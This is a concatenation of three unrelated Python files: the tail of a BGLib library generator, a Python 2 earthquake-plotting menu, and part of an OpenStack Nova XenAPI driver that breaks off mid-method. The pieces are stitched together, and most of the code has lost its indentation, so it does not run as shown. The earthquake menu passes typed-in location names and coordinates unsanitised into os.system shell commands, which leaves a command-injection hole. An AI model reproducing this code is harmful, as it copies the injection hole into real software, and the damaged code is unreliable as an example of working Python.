BGLib Python interface library code is placed under the MIT license\n\
Copyright (c) 2013 Jeff Rowberg\n\
Copyright (c) 2020 Silicon Laboratories\n\
Permission is hereby granted, free of charge, to any person obtaining a copy\n\
of this software and associated documentation files (the "Software"), to deal\n\
in the Software without restriction, including without limitation the rights\n\
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n\
copies of the Software, and to permit persons to whom the Software is\n\
furnished to do so, subject to the following conditions:\n\
\n\
The above copyright notice and this permission notice shall be included in\n\
all copies or substantial portions of the Software.\n\
\n\
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n\
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n\
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n\
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n\
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n\
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n\
THE SOFTWARE.\n\
===============================================\n'
+ 'Generated on {}'.format(datetime.now().strftime("%Y-%b-%d %H:%M:%S")) +
'\n===============================================\n\
\n\
"""\n\
\n\
__author__ = "Jeff Rowberg"\n\
__license__ = "MIT"\n\
__version__ = "2013-05-04"\n\
__email__ = "jeff@rowberg.net"\n\
\n\
import struct\n\
\n\
\n\
# thanks to Masaaki Shibata for Python event handler code\n\
# http://www.emptypage.jp/notes/pyevent.en.html\n\
\n\
class BGAPIEvent(object):\n\
\n\
def __init__(self, doc=None):\n\
self.__doc__ = doc\n\
\n\
def __get__(self, obj, objtype=None):\n\
if obj is None:\n\
return self\n\
return BGAPIEventHandler(self, obj)\n\
\n\
def __set__(self, obj, value):\n\
pass\n\
\n\
\n\
class BGAPIEventHandler(object):\n\
\n\
def __init__(self, event, obj):\n\
\n\
self.event = event\n\
self.obj = obj\n\
\n\
def _getfunctionlist(self):\n\
\n\
"""(internal use) """\n\
\n\
try:\n\
eventhandler = self.obj.__eventhandler__\n\
except AttributeError:\n\
eventhandler = self.obj.__eventhandler__ = {}\n\
return eventhandler.setdefault(self.event, [])\n\
\n\
def add(self, func):\n\
\n\
"""Add new event handler function.\n\
\n\
Event handler function must be defined like func(sender, earg).\n\
You can add handler also by using \'+=\' operator.\n\
"""\n\
\n\
self._getfunctionlist().append(func)\n\
return self\n\
\n\
def remove(self, func):\n\
\n\
"""Remove existing event handler function.\n\
\n\
You can remove handler also by using \'-=\' operator.\n\
"""\n\
\n\
self._getfunctionlist().remove(func)\n\
return self\n\
\n\
def fire(self, earg=None):\n\
\n\
"""Fire event and call all handler functions\n\
\n\
You can call EventHandler object itself like e(earg) instead of\n\
e.fire(earg).\n\
"""\n\
\n\
for func in self._getfunctionlist():\n\
func(self.obj, earg)\n\
\n\
__iadd__ = add\n\
__isub__ = remove\n\
__call__ = fire\n\
\n\
\n\
class BGLib(object):\n\
\n\
' + ('\n '.join(ble_command_method_definitions)) + '\n\n\
' + ('\n '.join(ble_response_callback_definitions)) + '\n\n\
' + ('\n '.join(ble_event_callback_definitions)) + '\n\
\n\
on_busy = BGAPIEvent()\n\
on_idle = BGAPIEvent()\n\
on_timeout = BGAPIEvent()\n\
on_before_tx_command = BGAPIEvent()\n\
on_tx_command_complete = BGAPIEvent()\n\
\n\
bgapi_rx_buffer = b""\n\
bgapi_rx_expected_length = 0\n\
busy = False\n\
debug = False\n\
\n\
def send_command(self, ser, packet):\n\
if self.debug: print(\'=>[ \' + \' \'.join([\'%02X\' % b for b in packet]) + \' ]\')\n\
self.on_before_tx_command()\n\
self.busy = True\n\
self.on_busy()\n\
ser.write(packet)\n\
self.on_tx_command_complete()\n\
\n\
def check_activity(self, ser, timeout=0):\n\
if timeout > 0:\n\
ser.timeout = timeout\n\
while 1:\n\
x = ser.read()\n\
if len(x) > 0:\n\
self.parse(x)\n\
else: # timeout\n\
self.busy = False\n\
self.on_idle()\n\
self.on_timeout()\n\
if not self.busy: # finished\n\
break\n\
else:\n\
while ser.inWaiting(): self.parse(ser.read())\n\
return self.busy\n\
\n\
def parse(self, barray):\n\
b=barray[0]\n\
if len(self.bgapi_rx_buffer) == 0 and (b == 0xa0 or b == 0x20):\n\
self.bgapi_rx_buffer+=bytes([b])\n\
elif len(self.bgapi_rx_buffer) == 1:\n\
self.bgapi_rx_buffer+=bytes([b])\n\
self.bgapi_rx_expected_length = 4 + (self.bgapi_rx_buffer[0] & 0x07) + self.bgapi_rx_buffer[1]\n\
elif len(self.bgapi_rx_buffer) > 1:\n\
self.bgapi_rx_buffer+=bytes([b])\n\
\n\
"""\n\
BGAPI packet structure (as of 2020-06-12):\n\
Byte 0:\n\
[7] - 1 bit, Message Type (MT) 0 = Command/Response, 1 = Event\n\
[6:3] - 4 bits, Technology Type (TT) 0010 - Blue Gecko\n\
[2:0] - 3 bits, Length High (LH) Payload length (high bits)\n\
Byte 1: 8 bits, Length Low (LL) Payload length (low bits)\n\
Byte 2: 8 bits, Class ID (CID) Command class ID\n\
Byte 3: 8 bits, Command ID (CMD) Command ID\n\
Bytes 4-n: 0 - 2048 Bytes, Payload (PL) Up to 2048 bytes of payload\n\
"""\n\
\n\
#print\'%02X: %d, %d\' % (b, len(self.bgapi_rx_buffer), self.bgapi_rx_expected_length)\n\
if self.bgapi_rx_expected_length > 0 and len(self.bgapi_rx_buffer) == self.bgapi_rx_expected_length:\n\
if self.debug: print(\'<=[ \' + \' \'.join([\'%02X\' % b for b in self.bgapi_rx_buffer ]) + \' ]\')\n\
packet_type, payload_length, packet_class, packet_command = self.bgapi_rx_buffer[:4]\n\
self.bgapi_rx_payload = self.bgapi_rx_buffer[4:]\n\
self.bgapi_rx_buffer = b""\n\
if packet_type & 0xa0 == 0x20:\n\
# 0x20 = Blue Gecko response packet\n\
' + ('\n '.join(ble_response_callback_parser_conditions)) + '\n\
self.busy = False\n\
self.on_idle()\n\
elif packet_type & 0xa0 == 0xa0:\n\
# 0xa0 = Blue Gecko event packet\n\
' + ('\n '.join(ble_event_callback_parser_conditions)) + '\n\
\n\
# ================================================================\n\
\n\
')
source.close()
print("Finished!\n")
print("Python Installation Instructions:")
print("====================================")
print("1. Add bglib.py to your project")
print("2. Import bglib.* in your source file(s)")
print("3. Add event handlers for desired BGLib response and event packets\n")
|
|
#!/opt/local/bin/python
# Python Menu Code to call the various procedures to plot EQ data and forecasts
#
# This code downloads data from various web sites and uses matplotlib to construct plots
import sys
import os
import numpy as np
from array import array
from EQUtilities import *
#.....................................
#
# Read pre-defined locations file
#
#.....................................
input_file = open("locations.txt", "r")
i=0
for line in input_file:
i += 1
input_file.close() # Close the file; it is reopened below to read from the top
number_locations = i
# Create arrays of length i filled with zeros
Location_file = ["" for x in range(i)]
MinLat_file = np.zeros(i)
MaxLat_file = np.zeros(i)
MinLng_file = np.zeros(i)
MaxLng_file = np.zeros(i)
input_file = open("locations.txt", "r")
i=-1
for line in input_file:
i+=1
line = line.strip()
items = line.split(',')
items_array = np.asarray(items)
Location_file[i] = items_array[0]
MinLat_file[i] = items_array[1]
MaxLat_file[i] = items_array[2]
MinLng_file[i] = items_array[3]
MaxLng_file[i] = items_array[4]
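# Example locations.txt row (hedged; column order inferred from the parsing
# loop above -- name, MinLat, MaxLat, MinLng, MaxLng):
#   California,32.0,42.0,-125.0,-114.0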
Location = Location_file[0]
SWLat = MinLat_file[0]
NELat = MaxLat_file[0]
SWLng = MinLng_file[0]
NELng = MaxLng_file[0]
Last_location = Location
input_file.close() # Done reading the locations file
#.....................................
MagLo = 5.0 # Initial default minimum magnitude
#.....................................
# Assume initially that the local region is a circle
completeness_mag = 2.99
Circle_Location = 'None'
Circle_Lat = 0.0
Circle_Lng = 0.0
Radius_float = 0.0
earthquake_depth = 1000.0
region_type = 'Circle'
settings_params = []
settings_params.append(region_type)
settings_params.append(completeness_mag)
settings_params.append(earthquake_depth)
settings_params.append(Circle_Location)
settings_params.append(Circle_Lat)
settings_params.append(Circle_Lng)
settings_params.append(Radius_float)
save_settings(settings_params)
settings_params = get_settings()
#.....................................
# Set the initial values of completeness_mag and Circle_Location here
# Write these to a file "current_settings.txt"
#.....................................
print ' '
print 'Downloading default data set'
os.system("python generate_catalog_file.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
#.....................................
rmenu = ''
print ' '
print ' This is the basic code to set up the menu of choices'
while rmenu != 'Z':
print ' '
print ' ...........................................'
print ' '
print ' Current location is: ', Location
print ' '
print ' A: Input Location and Catalog Parameters'
print ' B: Generate or Re-Generate Working Catalog File'
print ' C: Edit Working Catalog File (for Macs Only)'
print ' D: Plot EQ Magnitude vs. Time'
print ' E: Plot EQ Epicenters on a Map'
print ' F: Plot NTW Earthquake Forecast on a Map'
print ' G: Plot Gutenberg-Richter Relation for an Inter-Earthquake Sequence'
print ' H: Plot Earthquake NowCast for Regional Area'
print ' I: Plot Earthquake NowCast for Circle within Regional Area'
print ' J: Plot Earthquake NowCast for Polygon within Regional Area'
print ' K: Plot Proxy Strain vs. Time in the Region'
print ' L: Plot Proxy Strain vs. Time in the Circle'
# print ' M: Plot Earthquake Forecast vs. Time in the Circle'
# print ' N: Plot Filtered Earthquake NowCast for Regional Area (Same as H but Log10-Linear)'
print ' '
print ' Z: Get Me Out of Here!'
print ' '
print ' (You must choose ... but choose wisely!'
print ' For a true choice will bring you joy,'
print ' but a poor choice will take it from you...)'
print ' '
rmenu = ''
rmenu = raw_input("Enter a Choice: \n")
print ' '
#.....................................
if rmenu == 'B':
print 'Choice B: Generate or Re-Generate Working Catalog File'
os.system("python generate_catalog_file.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'C':
print 'Choice C: Open Working Catalog File in Text Editor'
# os.system("open -t EQ_Working_Catalog.txt") # Only for Macs. For other systems, substitute something like "gedit EQ_Working_Catalog.txt"
os.system("open -e EQ_Working_Catalog.txt") # Forces file open with Mac app Textedit
if rmenu == 'D':
print 'Choice D: Plot EQ Magnitude vs. Time'
os.system("python plot_ANSS_seismicity.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'E':
print 'Choice E: Plot EQ Epicenters on a Map'
os.system("python plot_ANSS_epicenters.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'F':
print 'Choice F: Plot NTW EQ Forecast on a Map'
os.system("python contour_eq_probs.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'G':
print 'Choice G: Plot Gutenberg-Richter relation (Cumulative frequency-magnitude)'
os.system("python plot_GR_relation.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'H':
print 'Choice H: Plot Earthquake EPS in Region (Defined by histogram of small earthquake counts)'
os.system("python plot_EQ_EPS_Region.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'I':
print 'Choice I: Plot Earthquake EPS in Circle within Region (Defined by histogram of small earthquake counts)'
os.system("python plot_EQ_EPS_Region_Circle.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'J':
print 'Choice J: Plot Earthquake EPS in Polygon within Region (Defined by histogram of small earthquake counts)'
os.system("python plot_EQ_EPS_Region_Polygon.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'K':
print 'Choice K: Plot Proxy Strain vs. Time in the Region'
os.system("python plot_proxy_strain_vs_time_region.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'L':
print 'Choice L: Plot Proxy Strain vs. Time in the Circle'
os.system("python plot_proxy_strain_vs_time_circle.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'M':
print 'Choice M: Plot Forecast in Circle within Region (Defined by histogram of small earthquake counts)'
os.system("python plot_Forecast_EPS_Region_Circle.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'N':
print 'Choice N: Plot Filtered Earthquake EPS in Region (Defined by histogram of small earthquake counts)'
os.system("python plot_Filtered_EQ_EPS_Region.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'A':
print 'Choice A: Enter the map and plot parameters (Default is California)'
print ' '
print ' Enter a different predefined location or large earthquake magnitude? (y/n)'
respl = raw_input()
if respl == 'y':
#......................................
print ' '
print ' Current pre-defined Locations are: '
print ' '
for j in range(number_locations):
print ' ', Location_file[j]
#......................................
print ' '
print ' Current location is: ', Location
print ' Enter new location (Case sensitive: Overrides previous parameter set):'
Location = raw_input()
location_flag = 0
for j in range(number_locations):
if Location == Location_file[j]:
SWLat = MinLat_file[j]
NELat = MaxLat_file[j]
SWLng = MinLng_file[j]
NELng = MaxLng_file[j]
location_flag = 1
Last_location = Location
if location_flag == 0:
print ' '
print ' Invalid location, try again...'
Location = Last_location
print ' '
print ' Minimum magnitude (for large earthquakes) is currently set at: ', MagLo
print ' Enter new minimum magnitude? (y/n)'
respm = raw_input()
if respm == 'y':
print ' '
print ' Current minimum magnitude is: ', MagLo
print ' Enter new minimum magnitude (must be M>5.0):'
                MagLo = float(raw_input())  # keep as a number so the M>5.0 intent holds
        if respl != 'y':
print ' '
print ' Enter parameters (Lats, Longs, Location Name?) (y/n)'
respp = raw_input()
if respp == 'y':
print ' '
print ' Enter Min Lat, Max Lat, Min Long, Max Long, Location Name'
print '>>>>>> (Requires 5 parameters separated by commas)'
items = raw_input().split(',')
print ' '
print ' You Entered: ', items
print ' '
                SWLat = items[0].strip()
                NELat = items[1].strip()
                SWLng = items[2].strip()
                NELng = items[3].strip()
                Location = items[4].strip()
print 'Downloading catalog data for new location and/or with new minimum magnitude'
os.system("python generate_catalog_file.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A driver for XenServer or Xen Cloud Platform.
**Related Flags**
:xenapi_connection_url: URL for connection to XenServer/Xen Cloud Platform.
:xenapi_connection_username: Username for connection to XenServer/Xen Cloud
Platform (default: root).
:xenapi_connection_password: Password for connection to XenServer/Xen Cloud
Platform.
:target_host: the iSCSI Target Host IP address, i.e. the IP
address for the nova-volume host
:target_port: iSCSI Target Port, 3260 Default
:iqn_prefix: IQN Prefix, e.g. 'iqn.2010-10.org.openstack'
**Variable Naming Scheme**
- suffix "_ref" for opaque references
- suffix "_uuid" for UUIDs
- suffix "_rec" for record objects
"""
import contextlib
import cPickle as pickle
import urlparse
import xmlrpclib
from eventlet import queue
from eventlet import timeout
from oslo.config import cfg
from nova import context
from nova import exception
from nova.openstack.common import log as logging
from nova.virt import driver
from nova.virt.xenapi import host
from nova.virt.xenapi import pool
from nova.virt.xenapi import pool_states
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import vmops
from nova.virt.xenapi import volumeops
LOG = logging.getLogger(__name__)
xenapi_opts = [
cfg.StrOpt('xenapi_connection_url',
default=None,
help='URL for connection to XenServer/Xen Cloud Platform. '
'Required if compute_driver=xenapi.XenAPIDriver'),
cfg.StrOpt('xenapi_connection_username',
default='root',
help='Username for connection to XenServer/Xen Cloud Platform. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.StrOpt('xenapi_connection_password',
default=None,
help='Password for connection to XenServer/Xen Cloud Platform. '
'Used only if compute_driver=xenapi.XenAPIDriver',
secret=True),
cfg.IntOpt('xenapi_connection_concurrent',
default=5,
help='Maximum number of concurrent XenAPI connections. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.FloatOpt('xenapi_vhd_coalesce_poll_interval',
default=5.0,
help='The interval used for polling of coalescing vhds. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.BoolOpt('xenapi_check_host',
default=True,
help='Ensure compute service is running on host XenAPI '
'connects to.'),
cfg.IntOpt('xenapi_vhd_coalesce_max_attempts',
default=5,
help='Max number of times to poll for VHD to coalesce. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.StrOpt('xenapi_sr_base_path',
default='/var/run/sr-mount',
help='Base path to the storage repository'),
cfg.StrOpt('target_host',
default=None,
help='iSCSI Target Host'),
cfg.StrOpt('target_port',
default='3260',
help='iSCSI Target Port, 3260 Default'),
cfg.StrOpt('iqn_prefix',
default='iqn.2010-10.org.openstack',
help='IQN Prefix'),
# NOTE(sirp): This is a work-around for a bug in Ubuntu Maverick,
# when we pull support for it, we should remove this
cfg.BoolOpt('xenapi_remap_vbd_dev',
default=False,
help='Used to enable the remapping of VBD dev '
'(Works around an issue in Ubuntu Maverick)'),
cfg.StrOpt('xenapi_remap_vbd_dev_prefix',
default='sd',
help='Specify prefix to remap VBD dev to '
'(ex. /dev/xvdb -> /dev/sdb)'),
cfg.IntOpt('xenapi_login_timeout',
default=10,
help='Timeout in seconds for XenAPI login.'),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_opts)
CONF.import_opt('host', 'nova.netconf')
class XenAPIDriver(driver.ComputeDriver):
"""A connection to XenServer or Xen Cloud Platform."""
def __init__(self, virtapi, read_only=False):
super(XenAPIDriver, self).__init__(virtapi)
url = CONF.xenapi_connection_url
username = CONF.xenapi_connection_username
password = CONF.xenapi_connection_password
if not url or password is None:
raise Exception(_('Must specify xenapi_connection_url, '
'xenapi_connection_username (optionally), and '
'xenapi_connection_password to use '
'compute_driver=xenapi.XenAPIDriver'))
self._session = XenAPISession(url, username, password, self.virtapi)
self._volumeops = volumeops.VolumeOps(self._session)
self._host_state = None
self._host = host.Host(self._session, self.virtapi)
self._vmops = vmops.VMOps(self._session, self.virtapi)
self._initiator = None
self._hypervisor_hostname = None
self._pool = pool.ResourcePool(self._session, self.virtapi)
@property
def host_state(self):
if not self._host_state:
self._host_state = host.HostState(self._session)
return self._host_state
def init_host(self, host):
if CONF.xenapi_check_host:
vm_utils.ensure_correct_host(self._session)
try:
vm_utils.cleanup_attached_vdis(self._session)
except Exception:
LOG.exception(_('Failure while cleaning up attached VDIs'))
def list_instances(self):
"""List VM instances."""
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
"""Create VM instance."""
self._vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info)
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
# TODO(Vek): Need to pass context in for access to auth_token
self._vmops.confirm_migration(migration, instance, network_info)
def finish_revert_migration(self, instance, network_info,
block_device_info=None):
"""Finish reverting a resize, powering back on the instance."""
# NOTE(vish): Xen currently does not use network info.
self._vmops.finish_revert_migration(instance, block_device_info)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance=False,
block_device_info=None):
"""Completes a resize, turning on the migrated instance."""
self._vmops.finish_migration(context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info)
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance."""
self._vmops.snapshot(context, instance, image_id, update_task_state)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None):
"""Reboot VM instance."""
self._vmops.reboot(instance, reboot_type)
def set_admin_password(self, instance, new_pass):
"""Set the root/admin password on the VM instance."""
self._vmops.set_admin_password(instance, new_pass)
def inject_file(self, instance, b64_path, b64_contents):
"""Create a file on the VM instance. The file path and contents
should be base64-encoded.
"""
self._vmops.inject_file(instance, b64_path, b64_contents)
def change_instance_metadata(self, context, instance, diff):
"""Apply a diff to the instance metadata."""
self._vmops.change_instance_metadata(instance, diff)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
"""Destroy VM instance."""
self._vmops.destroy(instance, network_info, block_device_info,
destroy_disks)
def pause(self, instance):
"""Pause VM instance."""
self._vmops.pause(instance)
def unpause(self, instance):
"""Unpause paused VM instance."""
self._vmops.unpause(instance)
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
"""Transfers the VHD of a running instance to another host, then shuts
off the instance copies over the COW disk"""
# NOTE(vish): Xen currently does not use network info.
rv = self._vmops.migrate_disk_and_power_off(context, instance,
dest, instance_type)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
name_label = self._vmops._get_orig_vm_name_label(instance)
for vol in block_device_mapping:
connection_info = vol['connection_info']
mount_device = vol['mount_device'].rpartition("/")[2]
self._volumeops.detach_volume(connection_info,
name_label, mount_device)
return rv
    def suspend(self, instance):
        """Suspend the specified instance."""
        self._vmops.suspend(instance)
    def resume(self, instance, network_info, block_device_info=None):
        """Resume the specified instance."""
        self._vmops.resume(instance)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Rescue the specified instance."""
self._vmops.rescue(context, instance, network_info, image_meta,
rescue_password)
def unrescue(self, instance, network_info):
"""Unrescue the specified instance."""
self._vmops.unrescue(instance)
def power_off(self, instance):
"""Power off the specified instance."""
self._vmops.power_off(instance)
def power_on(self, instance):
"""Power on the specified instance."""
self._vmops.power_on(instance)
def soft_delete(self, instance):
"""Soft delete the specified instance."""
self._vmops.soft_delete(instance)
def restore(self, instance):
"""Restore the specified instance."""
self._vmops.restore(instance)
def poll_rebooting_instances(self, timeout, instances):
"""Poll for rebooting instances."""
self._vmops.poll_rebooting_instances(timeout, instances)
    def reset_network(self, instance):
        """Reset networking for the specified instance."""
        self._vmops.reset_network(instance)
    def inject_network_info(self, instance, network_info):
        """Inject network info for the specified instance."""
        self._vmops.inject_network_info(instance, network_info)
def plug_vifs(self, instance_ref, network_info):
"""Plug VIFs into networks."""
self._vmops.plug_vifs(instance_ref, network_info)
def unplug_vifs(self, instance_ref, network_info):
"""Unplug VIFs from networks."""
self._vmops.unplug_vifs(instance_ref, network_info)
def get_info(self, instance):
"""Return data about VM instance."""
return self._vmops.get_info(instance)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_diagnostics(instance)
def get_all_bw_counters(self, instances):
"""Return bandwidth usage counters for each interface on each
running VM"""
# we only care about VMs that correspond to a nova-managed
# instance:
imap = dict([(inst['name'], inst['uuid']) for inst in instances])
bwcounters = []
# get a dictionary of instance names. values are dictionaries
# of mac addresses with values that are the bw counters:
        # e.g. {'instance-001': {'12:34:56:78:90:12': {'bw_in': 0, ...}}}
all_counters = self._vmops.get_all_bw_counters()
for instance_name, counters in all_counters.iteritems():
if instance_name in imap:
# yes these are stats for a nova-managed vm
# correlate the stats with the nova instance uuid:
for vif_counter in counters.values():
vif_counter['uuid'] = imap[instance_name]
bwcounters.append(vif_counter)
return bwcounters
def get_console_output(self, instance):
"""Return snapshot of console."""
return self._vmops.get_console_output(instance)
def get_vnc_console(self, instance):
"""Return link to instance's VNC console."""
return self._vmops.get_vnc_console(instance)
def get_volume_connector(self, instance):
"""Return volume connector information."""
if not self._initiator or not self._hypervisor_hostname:
stats = self.get_host_stats(refresh=True)
try:
self._initiator = stats['host_other-config']['iscsi_iqn']
self._hypervisor_hostname = stats['host_hostname']
except (TypeError, KeyError) as err:
LOG.warn(_('Could not determine key: %s') % err,
instance=instance)
self._initiator = None
return {
'ip': self.get_host_ip_addr(),
'initiator': self._initiator,
'host': self._hypervisor_hostname
}
@staticmethod
def get_host_ip_addr():
xs_url = urlparse.urlparse(CONF.xenapi_connection_url)
return xs_url.netloc
def attach_volume(self, connection_info, instance, mountpoint):
"""Attach volume storage to VM instance."""
return self._volumeops.attach_volume(connection_info,
instance['name'],
mountpoint)
def detach_volume(self, connection_info, instance, mountpoint):
"""Detach volume storage to VM instance."""
return self._volumeops.detach_volume(connection_info,
instance['name'],
mountpoint)
def get_console_pool_info(self, console_type):
xs_url = urlparse.urlparse(CONF.xenapi_connection_url)
return {'address': xs_url.netloc,
'username': CONF.xenapi_connection_username,
'password': CONF.xenapi_connection_password}
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called when nova-compute launches, and
as part of a periodic task.
:param nodename: ignored in this driver
:returns: dictionary describing resources
"""
host_stats = self.get_host_stats(refresh=True)
# Updating host information
total_ram_mb = host_stats['host_memory_total'] / (1024 * 1024)
# NOTE(belliott) memory-free-computed is a value provided by XenServer
# for gauging free memory more conservatively than memory-free.
free_ram_mb = host_stats['host_memory_free_computed'] / (1024 * 1024)
total_disk_gb = host_stats['disk_total'] / (1024 * 1024 * 1024)
used_disk_gb = host_stats['disk_used'] / (1024 * 1024 * 1024)
dic = {'vcpus': 0,
'memory_mb': total_ram_mb,
'local_gb': total_disk_gb,
'vcpus_used': 0,
'memory_mb_used': total_ram_mb - free_ram_mb,
'local_gb_used': used_disk_gb,
'hypervisor_type': 'xen',
'hypervisor_version': 0,
'hypervisor_hostname': host_stats['host_hostname'],
'cpu_info': host_stats['host_cpu_info']['cpu_count']}
return dic
def ensure_filtering_rules_for_instance(self, instance_ref, network_info):
# NOTE(salvatore-orlando): it enforces security groups on
# host initialization and live migration.
# In XenAPI we do not assume instances running upon host initialization
return
def check_can_live_migrate_destination(self, ctxt, instance_ref,
src_compute_info, dst_compute_info,
block_migration=False, disk_over_commit=False):
"""Check if it is possible to execute live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
"""
return self._vmops.check_can_live_migrate_destination(ctxt,
instance_ref,
block_migration,
disk_over_commit)
def check_can_live_migrate_destination_cleanup(self, ctxt,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param ctxt: security context
:param disk_over_commit: if true, allow disk over commit
"""
pass
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
includes the block_migration flag
"""
return self._vmops.check_can_live_migrate_source(ctxt, instance_ref,
dest_check_data)
def get_instance_disk_info(self, instance_name):
"""Used by libvirt for live migration. We rely on xenapi
checks to do this for us."""
pass
def pre_block_migration(self, ctxt, instance_ref, disk_info_json):
"""Used by libvirt for live migration. We rely on xenapi
checks to do this for us. May be used in the future to
populate the vdi/vif maps"""
pass
def live_migration(self, ctxt, instance_ref, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Performs the live migration of the specified instance.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, migrate VM disk.
:params migrate_data: implementation specific params
"""
self._vmops.live_migrate(ctxt, instance_ref, dest, post_method,
recover_method, block_migration, migrate_data)
def pre_live_migration(self, context, instance_ref, block_device_info,
network_info, migrate_data=None):
"""Preparation live migration.
:params block_device_info:
It must be the result of _get_instance_volume_bdms()
at compute manager.
"""
# TODO(JohnGarbutt) look again when boot-from-volume hits trunk
pass
def post_live_migration_at_destination(self, ctxt, instance_ref,
network_info, block_migration,
block_device_info=None):
"""Post operation of live migration at destination host.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params network_info: instance network information
        :params block_migration: if true, post operation of block_migration.
"""
# TODO(JohnGarbutt) look at moving/downloading ramdisk and kernel
pass
def unfilter_instance(self, instance_ref, network_info):
"""Removes security groups configured for an instance."""
return self._vmops.unfilter_instance(instance_ref, network_info)
def refresh_security_group_rules(self, security_group_id):
"""Updates security group rules for all instances associated with a
given security group.
Invoked when security group rules are updated."""
return self._vmops.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
"""Updates security group rules for all instances associated with a
given security group.
Invoked when instances are added/removed to a security group."""
return self._vmops.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
"""Updates security group rules for specified instance.
Invoked when instances are added/removed to a security group
or when a rule is added/removed to a security group."""
return self._vmops.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
return self._vmops.refresh_provider_fw_rules()
def get_host_stats(self, refresh=False):
"""Return the current state of the host. If 'refresh' is
True, run the update first."""
return self.host_state.get_host_stats(refresh=refresh)
def host_power_action(self, host, action):
"""The only valid values for 'action' on XenServer are 'reboot' or
'shutdown', even though the API also accepts 'startup'. As this is
not technically possible on XenServer, since the host is the same
physical machine as the hypervisor, if this is requested, we need to
raise an exception.
"""
if action in ("reboot", "shutdown"):
return self._host.host_power_action(host, action)
else:
msg = _("Host startup on XenServer is not supported.")
raise NotImplementedError(msg)
def set_host_enabled(self, host, enabled):
"""Sets the specified host's ability to accept new instances."""
return self._host.set_host_enabled(host, enabled)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime" on the target host."""
